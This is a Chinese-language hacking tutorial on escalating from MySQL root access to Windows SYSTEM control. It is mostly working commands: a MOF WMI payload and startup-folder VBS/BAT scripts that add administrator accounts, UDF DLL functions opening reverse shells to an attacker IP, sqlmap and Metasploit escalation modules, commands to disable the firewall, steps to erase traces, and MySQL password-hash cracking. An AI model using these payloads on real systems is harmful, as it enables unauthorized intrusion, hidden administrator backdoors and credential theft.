mysql 提权

一. mof 提权

1. Webshell上传mof文件提权

MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

方法1:运行 MOF 文件指定为命令行参数 Mofcomp.exe 文件。
方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。
方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用IMofCompiler::CompileFile方法。第三种方法仅为向后兼容性与早期版本的 WMI提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!

该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。
perl mysql_win_remote.pl 192.168.2.100 root “” 192.168.2.150 5555
192.168.2.100为mysql数据库所在服务器,mysql口令为空,反弹到192.168.2.150的5555端口上。

2.生成nullevt.mof文件

将以下代码保存为nullevt.mof文件:
#pragma namespace(“\\.\root\subscription”) instance of EventFilter as $EventFilter { EventNamespace = “Root\Cimv2”; Name = “filtP2”; Query = “Select \ From InstanceModificationEvent “ “Where TargetInstance Isa \”Win32_LocalTime\” “ “And TargetInstance.Second = 5”; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2”; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

3.通过Mysql查询将文件导入

执行以下查询语句,将上面生成的nullevt.mof导入到c:\windows\system32\wbem\mof\目录下在windows7中默认是拒绝访问的。导入后系统会自动运行,执行命令。
selectload_file(‘C:\RECYCLER\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

4. MSF 直接mof提权

  1. use exploit/windows/mysql/mysql_mof
  2.  set rhost 192.168.157.1 //设置需要提权的远程主机IP地址 
  3. set rport 3306 //设置mysql的远程端口 
  4. set password root //设置mysql数据库root密码 
  5. set username root //设置mysql用户名 
  6. options //查看设置
  7.  run

技巧:
要是能够通过网页连接管理(phpmyadmin),则可以修改host为%并刷新权限后,则可以通过msf等工具远程连接数据库。默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置。

方法1:本地登入mysql,更改 mysql数据库里的 user 表里的 host项,将localhost改为%

  1. use mysql; 
  2. update user set host = '%' where user = 'root';
  3.  FLUSH PRIVILEGES ;
  4.  select host, user from user;

方法2:直接授权(推荐)
从任何主机上使用root用户,密码:youpassword(你的root密码)连接到mysql服务器:

  1. # mysql -u root -p root 
  2. GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION; 
  3. FLUSH PRIVILEGES;

荐重新增加一个用户,在实际测试过程中发现很多服务器使用root配置了多个地址,修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户,授权所有权限,而不是直接更改root配置。

二. UDF 提权

UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限,其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数,有root账号密码
Windows下UDF提权对于Windows2008以下服务器比较适用,也即针对Windows2000、Windows2003的成功率较高。

1.UDF提权条件

(1)Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
(2)Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。
(3)掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。
(4)可以将udf.dll写入到相应目录的权限。

2.提权方法

(1)获取数据库版本、数据位置以及插件位置等信息

select version(); //获取数据库版本
select user(); //获取数据库用户
select @@basedir ; //获取安装目录
show variables like ‘%plugins%’; //寻找mysql安装路径

(2)导出路径

C:\Winnt\udf.dll Windows 2000
C:\Windows\udf.dll Windows2003(有的系统被转义,需要改为C:Windowsudf.dll)
MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数。该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。

在某些情况下,我们会遇到Can’t open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,网上大牛发现利用NTFS ADS流来创建文件夹的方法:
select @@basedir; //查找到mysql的目录

select ‘It is dll’ into dumpfile ‘C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION’; //利用NTFS ADS创建lib目录

select ‘It is dll’ into dumpfile ‘C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION’; //利用NTFS ADS创建plugin目录
执行成功以后就会plugin目录,然后再进行导出udf.dll即可。

(3)创建cmdshell 函数,该函数叫什么名字在后续中则使用该函数进行查询:

create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;

(4)执行命令:

select sys_eval(‘whoami’);

一般情况下不会出现创建不成功哦。
连不上3389可以先停止windows防火墙和筛选
select sys_eval(‘net stop policyagent’); select sys_eval(‘net stop sharedaccess’);

udf.dll下常见函数:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;

具体用户示例:
select cmdshell(‘net user iis_user 123!@#abcABC /add’);
select cmdshell(‘net localgroup administrators iis_user /add’);
select cmdshell(‘regedit /s d:web3389.reg’);
select cmdshell(‘netstat -an’);

(5)清除痕迹

drop function cmdshell;//将函数删除
删除udf.dll文件以及其它相关入侵文件及日志。

(6)常见错误

1290 - The MySQL server is running with the —secure-file-priv option so it cannot execute this statement
在my.ini或者mysql.cnf文件中注销 (使用#号) 包含secure_file_priv的行(SHOW VARIABLES LIKE “secure_file_priv”)。

1123 - Can’t initialize function ‘backshell’; UDFs are unavailable with the —skip-grant-tables option
需要将my.ini中的skip-grant-tables选项去掉。

3.webshell下udf提权

通过集成udf提权的webshell输入数据库用户名及密码以及数据库服务器地址或者IP通过连接后导出进行提权。

4.Mysql提权综合利用工具

v5est0r 写了一个Mysql提权综合利用工具,详细情况请参考其代码共享网站:https://github.com/v5est0r/Python_FuckMySQL其主要功能有:
(1)自动导出你的backdoor和mof文件
(2)自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权
(3)导出LPK.dll文件,劫持系统目录提权
(4)写启动项提权
UdF自动提权:
python root.py -a 127.0.0.1 -p root -e “ver&whoami” -m udf
LPK劫持提权:
python root.py -a 127.0.0.1 -p root -e “ver&whoami” -m lpk
启动项提权:
python root.py -a 127.0.0.1 -p root -e “ver&whoami” –mst
例如通过LOAD_FILE来查看Mysql配置文件my.ini,如果其中配置了skip-grant-tables,这无法进行提权

5. 无法获取webshell提权

1.连接mysql

(1)mysql.exe -h ip -uroot -p
(2)phpmyadmin
(3)Navicat for MySQL

2.查看数据库版本和数据路径

SELECT VERSION( );
Select @@datadir;

5.1以下版本,将dll导入到c:/windows或者c:/windows/system32/
5.1以上版本 通过以下查询来获取插件路径:
SHOW VARIABLES WHERE Variable_Name LIKE “%dir”;
show variables like ‘%plugin%’ ;
select load_file(‘C:/phpStudy/Apache/conf/httpd.conf’)
select load_file(‘C:/phpStudy/Apache/conf/vhosts.conf’)
select load_file(‘C:/phpStudy/Apache/conf/extra/vhosts.conf’)
select load_file(‘C:/phpStudy/Apache/conf/extra/httpd.conf’)
select load_file(‘d:/phpStudy/Apache/conf/vhosts.conf’)

3.修改mysql.txt

Mysql.txt为udf.dll的二进制文件转成十六进制代码。
(1)先执行导入ghost表中的内容
修改以下代码的末尾代码 select backshell(“YourIP”,4444);

(2)导出文件到某个目录

  1. select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';
  2. select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';
  3. select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';
  4. select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';
  5. select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'
  6. select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';
  7. select load_file('C:/ProgramData/MySQL/MySQL Server 5.1/Data/mysql/user.frm');
  8. select data from Ghost into dumpfile 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysqldll.dll'

(3)查看FUNCTION中是否存在cmdshell和backshell
存在则删除:
drop FUNCTION cmdshell;//删除
cmdshell drop FUNCTION backshell;//删除backshell

创建backshell:
CREATE FUNCTION backshell RETURNS STRING SONAME ‘mysqldll.dll’; //创建backshell

在具备独立主机的服务器上执行监听:
nc -vv -l -p 44444
执行查询:
select backshell(“192.192.192.1”,44444);//修改192.192.192.1为你的IP和端口

4.获取webshell后添加用户命令

注意如果不能直接执行,则需要到

  1. c:\windows\system32\下执行 
  2. net user antian365 www.xianzhi.aliyun.com /add 
  3. net localgroup administrators antian365

6. sqlmap直连数据库提权

Sqlmap直接连接数据库提权,需要有写入权限和root账号及密码,命令如下:
(1)连接数据库
sqlmap.py -d “mysql://root:123456@219.115.1.1:3306/mysql” —os-shell

(2)选择操作系统的架构,32位操作系统选择1,64位选择2
.
(3)自动上传udf或提示os-shell

(4)执行whomai命令如果获取系统权限,则表示提权成功。

  1. MSFUDF提权

Kali渗透测试平台下执行(kali下载地https://www.kali.org/downloads/):

  1. msfconsole use exploit/windows/mysql/mysql_payload 
  2. options set rhost 192.168.2.1 
  3. set rport 3306 
  4. set username root 
  5. set password 123456
  6.  run 或者exploit

msf下udf提权成功率并不高,跟windows操作系统版本,权限和数据库版本有关,特别是secure-file-priv选项,如果有该选项基本不会成功。

7. 启动项提权

1.创建表并插入vbs脚本到表中
依次使用以下命令:

  1. show databases ;
  2. use test;
  3. show tables;
  4. create table a (cmd text);
  5. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
  6. insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ;
  7. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );
  8. select \ from a;

导出vbs脚本到启动
使用以下命令将刚才在a表中创建的vbs脚本导出到启动选项中。
select \ from a into outfile “C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs”;

导入成功后,系统重新启动时会自动添加密码为“1”且用户名称为“1”的用户到管理员组中。在实际使用过程中该脚本成功执行的几率比较低,有时候会出现不能导出的错误.
推荐使用以下脚本:

  1. show databases ;
  2. use test;
  3. show tables;
  4. create table b (cmd text);
  5. insert into b values ("net user Aspnet123545345! /add");
  6. insert into b values ("net localgroup administrators Aspnet /add");
  7. insert into b values ("del b.bat");
  8. select  from b into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\b.bat";

该脚本执行后虽然会闪现Dos窗口,如果有权限导入到启动选项中,则一定会执行成功,在虚拟机中通过MySQL连接器连接并执行以上命令后,在C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录中会有刚才导出的b.bat脚本文件

说明
在不同的操作系统中C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录文件名称可能会不同,这个时候就要将其目录换成相应的目录名称即可。例如如果是英文版本操作系统则其插入的代码为:

  1. select  from b into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\b.bat";
  2. Windows 2008 Server的启动目录为:
  3. C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs

其vbs方法可以参考如下写法:

  1. create table a (cmd text);
  2. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
  3. insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );
  4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " );
  5. select \ from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

**

8. msf 下模块exploit/windows/mysql/mysql_start_up提权

///

  1. use exploit/windows/mysql/mysql_start_up 
  2. set rhost 192.168.2.1 
  3. set rport 3306
  4.  set username root 
  5. set password 123456
  6.  run

msf下mysql_start_up提权有一定的几率,对英文版系统支持较好。

Mysql 密码破解

1. cain工具破解mysql密码

使用UltraEdit-32编辑器直接打开user.MYD文件,打开后使用二进制模式进行查看,在root用户后面是一串字符串,选中这些字符串将其复制到记事本中,这些字符串即为用户加密值,例如506D1427F6F61696B4501445C90624897266DAE3。
注意:
(1)root后面的“”不要复制到字符串中。
(2)在有些情况下需要往后面看看,否则得到的不是完整的MYSQLSHA1密码,总之其正确的密码位数是40位。
安装cain工具,使用cracker,右键单击“Add tolist”将Mysql Hashes值加入到破解列表中,使用软件中的字典、暴力破解等方式来进行暴力破解。

2. 网站在线密码破解

1.cmd5.com破解。将获取的mysql值放在cmd5.com网站中进行查询,mysql密码一般都是收费的。
2.somd5.com破解。Somd5.com是后面出现的一个免费破解网站,每次破解需要手工选择图形码进行破解,速度快,效果好,只是每次只能破解一个,而且破解一次后需要重新输入验证码。

3. oclhash 破解

hashcat支持很多种破解算法,免费开源软件,
官方网站https://hashcat.net/hashcat/,破解命令:
hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323类型
hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5类型

4. John the Ripper password cracker

John the Ripper下载地址:http://www.openwall.com/john/h/john179w2.zip,John the Ripper除了能够破解linux外,还能破解多种格式的密码。
Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B>hashes.txt
John –format =mysql-sha1 hashes.txt
john —list=formats | grep mysql //查看支持mysql密码破解的算法